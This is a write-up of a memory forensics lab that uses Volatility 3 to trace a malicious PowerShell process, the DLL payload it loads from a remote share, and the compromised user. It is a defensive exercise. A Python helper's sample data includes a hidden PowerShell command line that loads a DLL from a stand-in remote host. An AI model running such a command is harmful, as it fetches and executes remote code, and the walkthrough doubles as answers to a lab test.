
Reveal Lab
Endpoint Forensics Lab
First of all, to answer this Endpoint Forensics machine we look at the process list to work out what happened here. After installing Volatility 3 from this repository https://github.com/volatilityfoundation/volatility3 I used the "-f" parameter followed by the location of the memory dump, then the "windows.pstree" plugin to produce the process tree, and redirected the output to a text file. Here is the full command:

python3 vol.py -f /home/kimo/Desktop/192-Reveal.dmp windows.pstree > /home/kimo/Desktop/Reveal.txt
1- To identify the malicious process I dug into the exported file. From the PPID and the name of the process I felt it was "4120", a process ID that indicates a newly created process, and secondly it was the most popular script runner, "Powershell.exe". In its command line I found an IP address, took it to VirusTotal to identify it, and it was simply malicious.
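To make that triage repeatable, here is an added helper script (not part of the original writeup) that parses a windows.pstree export, flags powershell.exe processes whose command line contains an IPv4 literal, and prints each hit with its PID, PPID and parent chain. It assumes the tab-separated text that Volatility 3's default renderer writes and uses a constructed sample instead of the real Reveal.txt; the IP, the command line and every PID except 4120 are made up.

```python
import re
from typing import Dict, List

# Constructed sample in the shape of Volatility 3 windows.pstree output
# (tab-separated, leading "*" marks tree depth). Not the real Reveal.txt.
SAMPLE_PSTREE = (
    "PID\tPPID\tImageFileName\tOffset(V)\tThreads\tHandles\tSessionId\tWow64"
    "\tCreateTime\tExitTime\tAudit\tCmd\tPath\n"
    "4\t0\tSystem\t0xa\t100\t-\tN/A\tFalse\t2024-01-01 10:00:00 UTC\tN/A\tN/A\tN/A\tN/A\n"
    "3688\t1164\texplorer.exe\t0xb\t40\t-\t1\tFalse\t2024-01-01 10:01:00 UTC\tN/A"
    "\tC:\\Windows\\explorer.exe\tC:\\Windows\\Explorer.EXE\tC:\\Windows\\explorer.exe\n"
    "* 4120\t3688\tpowershell.exe\t0xc\t12\t-\t1\tFalse\t2024-01-01 10:05:00 UTC\tN/A"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tpowershell.exe -w hidden -c \\\\203.0.113.5\\share\\payload.dll"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n"
)

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_pstree(text: str) -> Dict[int, dict]:
    """Turn the pstree text into {pid: {pid, ppid, name, cmd}} using header names."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    col = {name: i for i, name in enumerate(lines[0].split("\t"))}
    procs: Dict[int, dict] = {}
    for line in lines[1:]:
        fields = line.split("\t")
        m = re.match(r"^\**\s*(\d+)$", fields[col["PID"]])  # strip the "*" depth prefix
        if not m:
            continue
        pid = int(m.group(1))
        cmd = fields[col["Cmd"]] if "Cmd" in col and len(fields) > col["Cmd"] else ""
        procs[pid] = {"pid": pid, "ppid": int(fields[col["PPID"]]),
                      "name": fields[col["ImageFileName"]], "cmd": cmd}
    return procs


def ancestry(procs: Dict[int, dict], pid: int) -> List[str]:
    """Walk PPID links upward; stops at unknown parents or a PID cycle."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        p = procs[pid]
        chain.append(f"{p['name']}({p['pid']})")
        pid = p["ppid"]
    return chain


def find_suspicious(procs: Dict[int, dict]) -> List[dict]:
    """PowerShell processes whose command line carries an IPv4 address."""
    findings = []
    for p in procs.values():
        ips = sorted(set(IPV4_RE.findall(p["cmd"])))
        if p["name"].lower() == "powershell.exe" and ips:
            findings.append({"pid": p["pid"], "ppid": p["ppid"], "ips": ips,
                             "chain": " <- ".join(ancestry(procs, p["pid"]))})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(parse_pstree(SAMPLE_PSTREE)):
        print(f"PID {f['pid']} PPID {f['ppid']} IPs {f['ips']}  chain: {f['chain']}")
```

Run it against a real export with `parse_pstree(open("Reveal.txt").read())`; the extracted IPs are what you then look up on VirusTotal.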



2- This question simply asks for the PPID, which was already determined in the previous question.


3- The filename used by the malware to execute the second payload is still on the same line, and it is a DLL file. Because the malware communicates through PowerShell, every small detail in that command line leads you to the important information.

4- We are still in the same command: the shared folder simply comes right after the IP the malware communicated with (:

5- Here they want the MITRE sub-technique ID. The main technique used here is Defense Evasion, and the sub-technique is that the payload used a DLL file to execute, so there we go.


6- To determine the username I used Volatility again, this time with the UserAssist plugin, and the username was easy to find. Uncle Elon was compromised; I think the attacker sent him a mail to win an iPhone 16 (:


7- Here I used ThreatFox to determine the name.

Thanks for reading (: